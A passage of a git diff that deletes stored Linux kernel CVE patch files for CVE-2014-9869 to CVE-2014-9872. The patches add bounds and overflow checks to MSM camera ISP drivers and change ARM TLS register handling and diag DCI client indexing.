-Change-Id: I80b0fe7ac273352503d9705510f05debe6cbb10a
-Signed-off-by: Lakshmi Narayana Kalavala
----
- drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 21b9cdc..32cf0d3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -423,7 +423,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- __LINE__, csi_lane_params);
- return -EINVAL;
- }
-- csi_lane_mask = csi_lane_params->csi_lane_mask;
-+ csi_lane_mask = (csi_lane_params->csi_lane_mask & 0x1F);
-
- CDBG("%s csiphy_params, lane assign %x mask = %x\n",
- __func__,
-@@ -436,7 +436,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- csiphy_dev->lane_mask[csiphy_dev->pdev->id] &=
- ~(csi_lane_mask);
- i = 0;
-- while (csi_lane_mask & 0x1F) {
-+ while (csi_lane_mask) {
- if (csi_lane_mask & 0x1) {
- msm_camera_io_w(0x0, csiphy_dev->base +
- MIPI_CSIPHY_LNn_CFG2_ADDR + 0x40*i);
-@@ -507,7 +507,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- __LINE__, csi_lane_params);
- return -EINVAL;
- }
-- csi_lane_mask = csi_lane_params->csi_lane_mask;
-+ csi_lane_mask = (csi_lane_params->csi_lane_mask & 0x1F);
-
- CDBG("%s csiphy_params, lane assign %x mask = %x\n",
- __func__,
-@@ -520,7 +520,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- csiphy_dev->lane_mask[csiphy_dev->pdev->id] &=
- ~(csi_lane_mask);
- i = 0;
-- while (csi_lane_mask & 0x1F) {
-+ while (csi_lane_mask) {
- if (csi_lane_mask & 0x1) {
- msm_camera_io_w(0x0, csiphy_dev->base +
- MIPI_CSIPHY_LNn_CFG2_ADDR + 0x40*i);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch
deleted file mode 100644
index 289a1d0f..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 8d1f7531ff379befc129a6447642061e87562bca Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman
-Date: Tue, 23 Jul 2013 15:39:09 -0700
-Subject: msm: camera: Check stats index MAX in ISP driver
-
-Add a check for the stats index MAX using
-MSM_ISP_STATS_MAX before accessing stream info
-using that index to avoid any invalid memory access.
-
-Change-Id: Iaade2af5d0e3e073e9519961a0f84a93038284bf
-CRs-Fixed: 514711
-Signed-off-by: Hariram Purushothaman
----
- .../msm/camera_v2/isp/msm_isp_stats_util.c | 22 +++++++++++++++++++---
- 1 file changed, 19 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index d857a14..33f63b3 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -150,6 +150,12 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev,
- stats_idx = vfe_dev->hw_info->vfe_ops.stats_ops.
- get_stats_idx(stream_req_cmd->stats_type);
-
-+ if ((stats_idx > MSM_ISP_STATS_MAX) ||
-+ (stats_idx == -EINVAL)) {
-+ pr_err("%s: Stats idx Error\n", __func__);
-+ return rc;
-+ }
-+
- stream_info = &stats_data->stream_info[stats_idx];
- if (stream_info->state != STATS_AVALIABLE) {
- pr_err("%s: Stats already requested\n", __func__);
-@@ -188,7 +194,7 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev,
-
- int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg)
- {
-- int rc = 0;
-+ int rc = -1;
- struct msm_vfe_stats_stream_request_cmd *stream_req_cmd = arg;
- struct msm_vfe_stats_stream *stream_info = NULL;
- struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
-@@ -202,6 +208,11 @@ int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg)
- }
-
- stats_idx = STATS_IDX(stream_req_cmd->stream_handle);
-+ if (stats_idx > MSM_ISP_STATS_MAX) {
-+ pr_err("%s: Stats idx Error\n", __func__);
-+ return rc;
-+ }
-+
- stream_info = &stats_data->stream_info[stats_idx];
-
- framedrop_period = msm_isp_get_framedrop_period(
-@@ -228,9 +239,14 @@ int msm_isp_release_stats_stream(struct vfe_device *vfe_dev, void *arg)
- struct msm_vfe_stats_stream_release_cmd *stream_release_cmd = arg;
- struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
- int stats_idx = STATS_IDX(stream_release_cmd->stream_handle);
-- struct msm_vfe_stats_stream *stream_info =
-- &stats_data->stream_info[stats_idx];
-+ struct msm_vfe_stats_stream *stream_info = NULL;
-+
-+ if (stats_idx > MSM_ISP_STATS_MAX) {
-+ pr_err("%s: Stats idx Error\n", __func__);
-+ return rc;
-+ }
-
-+ stream_info = &stats_data->stream_info[stats_idx];
- if (stream_info->state == STATS_AVALIABLE) {
- pr_err("%s: stream already release\n", __func__);
- return rc;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch
deleted file mode 100644
index fb032866..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch
+++ /dev/null
@@ -1,145 +0,0 @@ -From 7a26934e4196b4aa61944081989189d59b108768 Mon Sep 17 00:00:00 2001 -From: Petar Sivenov -Date: Tue, 13 Aug 2013 10:12:39 -0700 -Subject: msm: camera: isp: Bound check for number stats registers - -The index of used stats register is derived from a stream handle least -significant byte and thus can be up to 255. However the stats registers -are up to 8 depending of the target. Thus a bound check is done before -use of the received stats register index value. - -Change-Id: Ic008918f4263f57a5b8aabd34266ac1ba3612a9c -Signed-off-by: Petar Sivenov ---- - .../msm/camera_v2/isp/msm_isp_stats_util.c | 50 ++++++++++++++++------ - .../platform/msm/camera_v2/isp/msm_isp_util.c | 4 +- - 2 files changed, 41 insertions(+), 13 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -index 0840e30..b479857 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -@@ -23,8 +23,16 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev, - struct msm_isp_buffer *buf; - uint32_t pingpong_bit = 0; - uint32_t bufq_handle = stream_info->bufq_handle; -- uint32_t stats_pingpong_offset = -- STATS_IDX(stream_info->stream_handle) + -+ uint32_t stats_pingpong_offset; -+ -+ if (STATS_IDX(stream_info->stream_handle) >= -+ vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, -+ STATS_IDX(stream_info->stream_handle)); -+ return -EINVAL; -+ } -+ -+ stats_pingpong_offset = STATS_IDX(stream_info->stream_handle) + - vfe_dev->hw_info->stats_hw_info->stats_ping_pong_offset; - - pingpong_bit = (~(pingpong_status >> stats_pingpong_offset) & 0x1); -@@ -151,10 +159,9 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev, - stats_idx = vfe_dev->hw_info->vfe_ops.stats_ops. 
- get_stats_idx(stream_req_cmd->stats_type); - -- if ((stats_idx > MSM_ISP_STATS_MAX) || -- (stats_idx == -EINVAL)) { -- pr_err("%s: Stats idx Error\n", __func__); -- return rc; -+ if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, stats_idx); -+ return -EINVAL; - } - - stream_info = &stats_data->stream_info[stats_idx]; -@@ -209,9 +216,10 @@ int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg) - } - - stats_idx = STATS_IDX(stream_req_cmd->stream_handle); -- if (stats_idx > MSM_ISP_STATS_MAX) { -- pr_err("%s: Stats idx Error\n", __func__); -- return rc; -+ -+ if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, stats_idx); -+ return -EINVAL; - } - - stream_info = &stats_data->stream_info[stats_idx]; -@@ -242,9 +250,9 @@ int msm_isp_release_stats_stream(struct vfe_device *vfe_dev, void *arg) - int stats_idx = STATS_IDX(stream_release_cmd->stream_handle); - struct msm_vfe_stats_stream *stream_info = NULL; - -- if (stats_idx > MSM_ISP_STATS_MAX) { -- pr_err("%s: Stats idx Error\n", __func__); -- return rc; -+ if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, stats_idx); -+ return -EINVAL; - } - - stream_info = &stats_data->stream_info[stats_idx]; -@@ -379,6 +387,12 @@ static int msm_isp_start_stats_stream(struct vfe_device *vfe_dev, - struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data; - for (i = 0; i < stream_cfg_cmd->num_streams; i++) { - idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]); -+ -+ if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, idx); -+ return -EINVAL; -+ } -+ - stream_info = &stats_data->stream_info[idx]; - if (stream_info->stream_handle != - stream_cfg_cmd->stream_handle[i]) { -@@ -423,6 +437,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device 
*vfe_dev, - struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data; - for (i = 0; i < stream_cfg_cmd->num_streams; i++) { - idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]); -+ -+ if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, idx); -+ return -EINVAL; -+ } -+ - stream_info = &stats_data->stream_info[idx]; - if (stream_info->stream_handle != - stream_cfg_cmd->stream_handle[i]) { -@@ -453,6 +473,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device *vfe_dev, - - for (i = 0; i < stream_cfg_cmd->num_streams; i++) { - idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]); -+ -+ if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) { -+ pr_err("%s Invalid stats index %d", __func__, idx); -+ return -EINVAL; -+ } -+ - stream_info = &stats_data->stream_info[idx]; - msm_isp_deinit_stats_ping_pong_reg(vfe_dev, stream_info); - } -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -index fcdf34e..6dba4153 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -@@ -768,6 +768,8 @@ void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev) - void msm_isp_process_error_info(struct vfe_device *vfe_dev) - { - int i; -+ uint8_t num_stats_type = -+ vfe_dev->hw_info->stats_hw_info->num_stats_type; - struct msm_vfe_error_info *error_info = &vfe_dev->error_info; - static DEFINE_RATELIMIT_STATE(rs, - DEFAULT_RATELIMIT_INTERVAL, DEFAULT_RATELIMIT_BURST); -@@ -791,7 +793,7 @@ void msm_isp_process_error_info(struct vfe_device *vfe_dev) - error_info->stream_framedrop_count[i] = 0; - } - } -- for (i = 0; i < MSM_ISP_STATS_MAX; i++) { -+ for (i = 0; i < num_stats_type; i++) { - if (error_info->stats_framedrop_count[i] != 0 && - __ratelimit(&rs_stats)) { - pr_err("%s: Stats stream[%d]: dropped %d frames\n", --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch
deleted file mode 100644
index ae176f5b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch
+++ /dev/null
@@ -1,216 +0,0 @@ -From 4f57652fcd2dce7741f1ac6dc0417e2f265cd1de Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Andr=C3=A9=20Hentschel?= -Date: Tue, 18 Jun 2013 23:23:26 +0100 -Subject: ARM: 7735/2: Preserve the user r/w register TPIDRURW on context - switch and fork -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -Since commit 6a1c53124aa1 the user writeable TLS register was zeroed to -prevent it from being used as a covert channel between two tasks. - -There are more and more applications coming to Windows RT, -Wine could support them, but mostly they expect to have -the thread environment block (TEB) in TPIDRURW. - -This patch preserves that register per thread instead of clearing it. -Unlike the TPIDRURO, which is already switched, the TPIDRURW -can be updated from userspace so needs careful treatment in the case that we -modify TPIDRURW and call fork(). To avoid this we must always read -TPIDRURW in copy_thread. - -Change-Id: Ib1e25be7b9faa846ba5335aad2574e21a1246066 -Signed-off-by: André Hentschel -Signed-off-by: Will Deacon -Signed-off-by: Jonathan Austin -Signed-off-by: Russell King -Git-commit: a4780adeefd042482f624f5e0d577bf9cdcbb760 -Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git -[joonwoop@codeaurora.org: fixed merge conflict] -CRs-fixed: 561044 -Signed-off-by: Joonwoo Park ---- - arch/arm/include/asm/thread_info.h | 2 +- - arch/arm/include/asm/tls.h | 40 +++++++++++++++++++++++++------------- - arch/arm/kernel/entry-armv.S | 5 +++-- - arch/arm/kernel/process.c | 4 +++- - arch/arm/kernel/ptrace.c | 2 +- - arch/arm/kernel/traps.c | 4 ++-- - 6 files changed, 37 insertions(+), 20 deletions(-) - -diff --git a/arch/arm/include/asm/thread_info.h b/arch/arm/include/asm/thread_info.h -index 67d6443..2eb0c2c 100644 ---- a/arch/arm/include/asm/thread_info.h -+++ b/arch/arm/include/asm/thread_info.h -@@ -58,7 +58,7 @@ struct thread_info { - struct cpu_context_save cpu_context; /* cpu context */ 
- __u32 syscall; /* syscall number */ - __u8 used_cp[16]; /* thread used copro */ -- unsigned long tp_value; -+ unsigned long tp_value[2]; /* TLS registers */ - struct crunch_state crunchstate; - union fp_state fpstate __attribute__((aligned(8))); - union vfp_state vfpstate; -diff --git a/arch/arm/include/asm/tls.h b/arch/arm/include/asm/tls.h -index 73409e6..83259b8 100644 ---- a/arch/arm/include/asm/tls.h -+++ b/arch/arm/include/asm/tls.h -@@ -2,27 +2,30 @@ - #define __ASMARM_TLS_H - - #ifdef __ASSEMBLY__ -- .macro set_tls_none, tp, tmp1, tmp2 -+#include -+ .macro switch_tls_none, base, tp, tpuser, tmp1, tmp2 - .endm - -- .macro set_tls_v6k, tp, tmp1, tmp2 -+ .macro switch_tls_v6k, base, tp, tpuser, tmp1, tmp2 -+ mrc p15, 0, \tmp2, c13, c0, 2 @ get the user r/w register - mcr p15, 0, \tp, c13, c0, 3 @ set TLS register -- mov \tmp1, #0 -- mcr p15, 0, \tmp1, c13, c0, 2 @ clear user r/w TLS register -+ mcr p15, 0, \tpuser, c13, c0, 2 @ and the user r/w register -+ str \tmp2, [\base, #TI_TP_VALUE + 4] @ save it - .endm - -- .macro set_tls_v6, tp, tmp1, tmp2 -+ .macro switch_tls_v6, base, tp, tpuser, tmp1, tmp2 - ldr \tmp1, =elf_hwcap - ldr \tmp1, [\tmp1, #0] - mov \tmp2, #0xffff0fff - tst \tmp1, #HWCAP_TLS @ hardware TLS available? 
-- mcrne p15, 0, \tp, c13, c0, 3 @ yes, set TLS register -- movne \tmp1, #0 -- mcrne p15, 0, \tmp1, c13, c0, 2 @ clear user r/w TLS register - streq \tp, [\tmp2, #-15] @ set TLS value at 0xffff0ff0 -+ mrcne p15, 0, \tmp2, c13, c0, 2 @ get the user r/w register -+ mcrne p15, 0, \tp, c13, c0, 3 @ yes, set TLS register -+ mcrne p15, 0, \tpuser, c13, c0, 2 @ set user r/w register -+ strne \tmp2, [\base, #TI_TP_VALUE + 4] @ save it - .endm - -- .macro set_tls_software, tp, tmp1, tmp2 -+ .macro switch_tls_software, base, tp, tpuser, tmp1, tmp2 - mov \tmp1, #0xffff0fff - str \tp, [\tmp1, #-15] @ set TLS value at 0xffff0ff0 - .endm -@@ -31,19 +34,30 @@ - #ifdef CONFIG_TLS_REG_EMUL - #define tls_emu 1 - #define has_tls_reg 1 --#define set_tls set_tls_none -+#define switch_tls switch_tls_none - #elif defined(CONFIG_CPU_V6) - #define tls_emu 0 - #define has_tls_reg (elf_hwcap & HWCAP_TLS) --#define set_tls set_tls_v6 -+#define switch_tls switch_tls_v6 - #elif defined(CONFIG_CPU_32v6K) - #define tls_emu 0 - #define has_tls_reg 1 --#define set_tls set_tls_v6k -+#define switch_tls switch_tls_v6k - #else - #define tls_emu 0 - #define has_tls_reg 0 --#define set_tls set_tls_software -+#define switch_tls switch_tls_software - #endif - -+#ifndef __ASSEMBLY__ -+static inline unsigned long get_tpuser(void) -+{ -+ unsigned long reg = 0; -+ -+ if (has_tls_reg && !tls_emu) -+ __asm__("mrc p15, 0, %0, c13, c0, 2" : "=r" (reg)); -+ -+ return reg; -+} -+#endif - #endif /* __ASMARM_TLS_H */ -diff --git a/arch/arm/kernel/entry-armv.S b/arch/arm/kernel/entry-armv.S -index 7a8c2d6..0bdba55 100644 ---- a/arch/arm/kernel/entry-armv.S -+++ b/arch/arm/kernel/entry-armv.S -@@ -698,15 +698,16 @@ ENTRY(__switch_to) - UNWIND(.fnstart ) - UNWIND(.cantunwind ) - add ip, r1, #TI_CPU_SAVE -- ldr r3, [r2, #TI_TP_VALUE] - ARM( stmia ip!, {r4 - sl, fp, sp, lr} ) @ Store most regs on stack - THUMB( stmia ip!, {r4 - sl, fp} ) @ Store most regs on stack - THUMB( str sp, [ip], #4 ) - THUMB( str lr, [ip], #4 ) -+ 
ldr r4, [r2, #TI_TP_VALUE] -+ ldr r5, [r2, #TI_TP_VALUE + 4] - #ifdef CONFIG_CPU_USE_DOMAINS - ldr r6, [r2, #TI_CPU_DOMAIN] - #endif -- set_tls r3, r4, r5 -+ switch_tls r1, r4, r5, r3, r7 - #if defined(CONFIG_CC_STACKPROTECTOR) && !defined(CONFIG_SMP) - ldr r7, [r2, #TI_TASK] - ldr r8, =__stack_chk_guard -diff --git a/arch/arm/kernel/process.c b/arch/arm/kernel/process.c -index 0ff45bd..18e92f6 100644 ---- a/arch/arm/kernel/process.c -+++ b/arch/arm/kernel/process.c -@@ -38,6 +38,7 @@ - #include - #include - #include -+#include - - #ifdef CONFIG_CC_STACKPROTECTOR - #include -@@ -558,7 +559,8 @@ copy_thread(unsigned long clone_flags, unsigned long stack_start, - clear_ptrace_hw_breakpoint(p); - - if (clone_flags & CLONE_SETTLS) -- thread->tp_value = regs->ARM_r3; -+ thread->tp_value[0] = childregs->ARM_r3; -+ thread->tp_value[1] = get_tpuser(); - - thread_notify(THREAD_NOTIFY_COPY, thread); - -diff --git a/arch/arm/kernel/ptrace.c b/arch/arm/kernel/ptrace.c -index 9650c14..c6c6be7 100644 ---- a/arch/arm/kernel/ptrace.c -+++ b/arch/arm/kernel/ptrace.c -@@ -844,7 +844,7 @@ long arch_ptrace(struct task_struct *child, long request, - #endif - - case PTRACE_GET_THREAD_AREA: -- ret = put_user(task_thread_info(child)->tp_value, -+ ret = put_user(task_thread_info(child)->tp_value[0], - datap); - break; - -diff --git a/arch/arm/kernel/traps.c b/arch/arm/kernel/traps.c -index 12e6fcb..e0a066b 100644 ---- a/arch/arm/kernel/traps.c -+++ b/arch/arm/kernel/traps.c -@@ -593,7 +593,7 @@ asmlinkage int arm_syscall(int no, struct pt_regs *regs) - return regs->ARM_r0; - - case NR(set_tls): -- thread->tp_value = regs->ARM_r0; -+ thread->tp_value[0] = regs->ARM_r0; - if (tls_emu) - return 0; - if (has_tls_reg) { -@@ -711,7 +711,7 @@ static int get_tp_trap(struct pt_regs *regs, unsigned int instr) - int reg = (instr >> 12) & 15; - if (reg == 15) - return 1; -- regs->uregs[reg] = current_thread_info()->tp_value; -+ regs->uregs[reg] = current_thread_info()->tp_value[0]; - regs->ARM_pc += 
4;
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch
deleted file mode 100644
index a777f848..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch
+++ /dev/null
@@ -1,146 +0,0 @@ -From f615e40c706708f74cd826d5b19c63025f54c041 Mon Sep 17 00:00:00 2001 -From: Seemanta Dutta -Date: Tue, 23 Jul 2013 15:52:22 -0700 -Subject: msm: camera: Fix potential memory overflow errors - -Fix potential memory overflow errors in msm_isp_util.c which happen -under certain rare conditions. - -CRs-fixed: 514717 -Change-Id: I8c70e089df9bf1e7a364c5c8264b782c9c23bf0b -Signed-off-by: Seemanta Dutta ---- - .../platform/msm/camera_v2/isp/msm_isp_util.c | 47 +++++++++++++++++++--- - .../platform/msm/camera_v2/isp/msm_isp_util.h | 2 +- - 2 files changed, 43 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -index 3806213..9b9c5a3 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -@@ -366,7 +366,7 @@ long msm_isp_ioctl(struct v4l2_subdev *sd, - break; - case VIDIOC_MSM_ISP_SET_SRC_STATE: - mutex_lock(&vfe_dev->core_mutex); -- msm_isp_set_src_state(vfe_dev, arg); -+ rc = msm_isp_set_src_state(vfe_dev, arg); - mutex_unlock(&vfe_dev->core_mutex); - break; - case VIDIOC_MSM_ISP_REQUEST_STATS_STREAM: -@@ -410,7 +410,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - if (resource_size(vfe_dev->vfe_mem) < - (reg_cfg_cmd->u.rw_info.reg_offset + - reg_cfg_cmd->u.rw_info.len)) { -- pr_err("%s: Invalid length\n", __func__); -+ pr_err("%s: VFE_WRITE: Invalid length\n", __func__); - return -EINVAL; - } - msm_camera_io_memcpy(vfe_dev->vfe_base + -@@ -422,16 +422,37 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - case VFE_WRITE_MB: { - uint32_t *data_ptr = cfg_data + - reg_cfg_cmd->u.rw_info.cmd_data_offset/4; -+ -+ if ((UINT_MAX - sizeof(*data_ptr) < -+ reg_cfg_cmd->u.rw_info.reg_offset) || -+ (resource_size(vfe_dev->vfe_mem) < -+ reg_cfg_cmd->u.rw_info.reg_offset + -+ sizeof(*data_ptr))) { -+ pr_err("%s: VFE_WRITE_MB: Invalid length\n", 
__func__); -+ return -EINVAL; -+ } - msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base + - reg_cfg_cmd->u.rw_info.reg_offset); - break; - } - case VFE_CFG_MASK: { - uint32_t temp; -+ if (resource_size(vfe_dev->vfe_mem) < -+ reg_cfg_cmd->u.mask_info.reg_offset) -+ return -EINVAL; - temp = msm_camera_io_r(vfe_dev->vfe_base + - reg_cfg_cmd->u.mask_info.reg_offset); -+ - temp &= ~reg_cfg_cmd->u.mask_info.mask; - temp |= reg_cfg_cmd->u.mask_info.val; -+ if ((UINT_MAX - sizeof(temp) < -+ reg_cfg_cmd->u.mask_info.reg_offset) || -+ (resource_size(vfe_dev->vfe_mem) < -+ reg_cfg_cmd->u.mask_info.reg_offset + -+ sizeof(temp))) { -+ pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__); -+ return -EINVAL; -+ } - msm_camera_io_w(temp, vfe_dev->vfe_base + - reg_cfg_cmd->u.mask_info.reg_offset); - break; -@@ -443,8 +464,10 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL; - uint32_t hi_val, lo_val, lo_val1; - if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) { -- if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset + -- reg_cfg_cmd->u.dmi_info.len > cmd_len) { -+ if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset < -+ reg_cfg_cmd->u.dmi_info.len) || -+ (reg_cfg_cmd->u.dmi_info.hi_tbl_offset + -+ reg_cfg_cmd->u.dmi_info.len > cmd_len)) { - pr_err("Invalid Hi Table out of bounds\n"); - return -EINVAL; - } -@@ -528,6 +551,12 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - uint32_t *data_ptr = cfg_data + - reg_cfg_cmd->u.rw_info.cmd_data_offset/4; - for (i = 0; i < reg_cfg_cmd->u.rw_info.len/4; i++) { -+ if ((data_ptr < cfg_data) || -+ (UINT_MAX / sizeof(*data_ptr) < -+ (data_ptr - cfg_data)) || -+ (sizeof(*data_ptr) * (data_ptr - cfg_data) > -+ cmd_len)) -+ return -EINVAL; - *data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base + - reg_cfg_cmd->u.rw_info.reg_offset); - reg_cfg_cmd->u.rw_info.reg_offset += 4; -@@ -545,6 +574,11 @@ int msm_isp_proc_cmd(struct vfe_device *vfe_dev, void *arg) - struct msm_vfe_reg_cfg_cmd 
*reg_cfg_cmd; - uint32_t *cfg_data; - -+ if (!proc_cmd->num_cfg) { -+ pr_err("%s: Passed num_cfg as 0\n", __func__); -+ return -EINVAL; -+ } -+ - reg_cfg_cmd = kzalloc(sizeof(struct msm_vfe_reg_cfg_cmd)* - proc_cmd->num_cfg, GFP_KERNEL); - if (!reg_cfg_cmd) { -@@ -856,11 +890,14 @@ void msm_isp_do_tasklet(unsigned long data) - } - } - --void msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg) -+int msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg) - { - struct msm_vfe_axi_src_state *src_state = arg; -+ if (src_state->input_src >= VFE_SRC_MAX) -+ return -EINVAL; - vfe_dev->axi_data.src_info[src_state->input_src].active = - src_state->src_active; -+ return 0; - } - - int msm_isp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh) -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h -index 34b9859..9d9558a 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h -@@ -64,7 +64,7 @@ int msm_isp_cal_word_per_line(uint32_t output_format, - uint32_t pixel_per_line); - int msm_isp_get_bit_per_pixel(uint32_t output_format); - irqreturn_t msm_isp_process_irq(int irq_num, void *data); --void msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg); -+int msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg); - void msm_isp_do_tasklet(unsigned long data); - void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev); - void msm_isp_process_error_info(struct vfe_device *vfe_dev); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch deleted file mode 100644 index d8872c85..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch +++ /dev/null 
@@ -1,99 +0,0 @@ -From fc787ebd71fa231cc7dd2a0d5f2208da0527096a Mon Sep 17 00:00:00 2001 -From: Katish Paran -Date: Fri, 31 Jan 2014 12:00:37 +0530 -Subject: diag: dci: Index DCI client table by client id - -Diag driver maintains a table of all DCI clients. This table -is currently indexed by the PID of the clients. Make changes -to index the table base on an unique client id. - -Change-Id: I57bfab9eae1381882b8eb6270d7ac212e0aaf271 -CRs-fixed: 590721 -Signed-off-by: Katish Paran ---- - drivers/char/diag/diag_dci.c | 16 ++++++++++++++++ - drivers/char/diag/diag_dci.h | 4 ++++ - drivers/char/diag/diagchar_core.c | 4 +++- - 3 files changed, 23 insertions(+), 1 deletion(-) - -diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c -index 37c236d..0edfdad 100644 ---- a/drivers/char/diag/diag_dci.c -+++ b/drivers/char/diag/diag_dci.c -@@ -847,6 +847,22 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - return ret; - } - -+int diag_dci_find_client_index_health(int client_id) -+{ -+ int i, ret = DCI_CLIENT_INDEX_INVALID; -+ -+ for (i = 0; i < MAX_DCI_CLIENTS; i++) { -+ if (driver->dci_client_tbl[i].client != NULL) { -+ if (driver->dci_client_tbl[i].client_id == -+ client_id) { -+ ret = i; -+ break; -+ } -+ } -+ } -+ return ret; -+} -+ - int diag_dci_find_client_index(int client_id) - { - int i, ret = DCI_CLIENT_INDEX_INVALID; -diff --git a/drivers/char/diag/diag_dci.h b/drivers/char/diag/diag_dci.h -index 2ab8a36..870b0f3 100644 ---- a/drivers/char/diag/diag_dci.h -+++ b/drivers/char/diag/diag_dci.h -@@ -56,6 +56,7 @@ struct dci_pkt_req_entry_t { - } __packed; - - struct diag_dci_client_tbl { -+ uint32_t client_id; - struct task_struct *client; - uint16_t list; /* bit mask */ - int signal_type; -@@ 